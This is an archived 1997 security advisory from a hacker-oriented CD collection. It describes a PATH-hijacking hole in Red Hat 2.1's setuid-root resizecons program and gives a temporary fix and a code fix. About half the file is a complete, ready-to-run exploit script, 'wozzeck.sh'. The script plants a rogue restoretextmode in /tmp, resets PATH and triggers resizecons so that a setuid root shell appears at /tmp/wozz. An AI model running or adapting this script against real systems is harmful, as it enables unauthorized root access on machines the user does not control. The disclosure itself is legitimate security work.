home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / linux / linux-~3.asc < prev    next >
Encoding:
Text File  |  1997-03-11  |  2.7 KB  |  77 lines
  1.  
  2.  
  3.  
  4.  
  5.    There is a security hole in RedHat 2.1, which installs the program
  6.  
  7. /usr/bin/resizecons suid root.  The resizecons program allows a user
  8.  
  9. to change the videmode of the console.  During this process, it runs
  10.  
  11. the program restoretextmode without an absolute pathname, assuming the
  12.  
  13. correct version will be found in the path, while running with root
  14.  
  15. privileges.  It then executes setfont in the same manner.  By setting
  16.  
  17. the path to find a rogue restoretextmode, a user can execute an arbitrary
  18.  
  19. program as root.
  20.  
  21.    As a more amusing aside, the file /tmp/selection.pid is read and the
  22.  
  23. pid contained within is sent a SIGWINCH, allowing a user on the system
  24.  
  25. to force a redraw of the screen to an arbitrary process (that handles 
  26.  
  27. SIGWINCH calls) on the machine. 
  28.  
  29.    If /usr/bin/resizecons needs to be run by users other than root at the
  30.  
  31. console, provisions need to be made in the code to execute the outside
  32.  
  33. utilities with absolute pathnames, and to check access rights on files
  34.  
  35. before opening.
  36.  
  37.  
  38.  
  39.                    Program: /usr/bin/resizecons
  40.  
  41. Affected Operating Systems: Red Hat 2.1 linux distribution
  42.  
  43.               Requirements: account on system
  44.  
  45.            Temporary Patch: chmod -s /usr/bin/resizecons
  46.  
  47.        Security Compromise: root
  48.  
  49.                     Author: Dave M. (davem@cmu.edu)
  50.  
  51.                   Synopsis: resizecons runs restoretextmode without an
  52.  
  53.                             absolute pathname while executing as root,
  54.  
  55.                             allowing a user to substitute the real
  56.  
  57.                             program with arbitrary commands.
  58.  
  59.  
  60.  
  61. Exploit:
  62.  
  63.  
  64.  
  65. wozzeck.sh:
  66.  
  67. #!/bin/sh
  68.  
  69. #
  70.  
  71. # wozzeck.sh
  72.  
  73. # exploits a security hole in /usr/bin/resizecons 
  74.  
  75. # to create a suid root shell in /tmp/wozz on a 
  76.  
  77. # linux Red Hat 2.1 system.
  78.  
  79. #
  80.  
  81. # by Dave M. (davem@cmu.edu)
  82.  
  84.  
  85. echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
  86.  
  87. echo ================ Checking system vulnerability
  88.  
  89. if test -u /usr/bin/resizecons
  90.  
  91. then
  92.  
  93. echo ++++++++++++++++ System appears vulnerable.
  94.  
  95. cd /tmp
  96.  
  97. cat << _EOF_ > /tmp/313x37
  98.  
  99. This exploit is dedicated to 
  100.  
  101. Wozz.  Use it with care.
  102.  
  103. _EOF_
  104.  
  105. cat << _EOF_ > /tmp/restoretextmode
  106.  
  107. #!/bin/sh
  108.  
  109. /bin/cp /bin/sh /tmp/wozz
  110.  
  111. /bin/chmod 4777 /tmp/wozz
  112.  
  113. _EOF_
  114.  
  115. /bin/chmod +x /tmp/restoretextmode
  116.  
  117. PATH=/tmp
  118.  
  119. echo ================ Executing resizecons
  120.  
  121. /usr/bin/resizecons 313x37
  122.  
  123. /bin/rm /tmp/restoretextmode
  124.  
  125. /bin/rm /tmp/313x37
  126.  
  127. if test -u /tmp/wozz
  128.  
  129. then
  130.  
  131. echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
  132.  
  133. else
  134.  
  135. echo ---------------- Exploit failed
  136.  
  137. fi
  138.  
  139. else
  140.  
  141. echo ---------------- This machine does not appear to be vulnerable.
  142.  
  143. fi
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.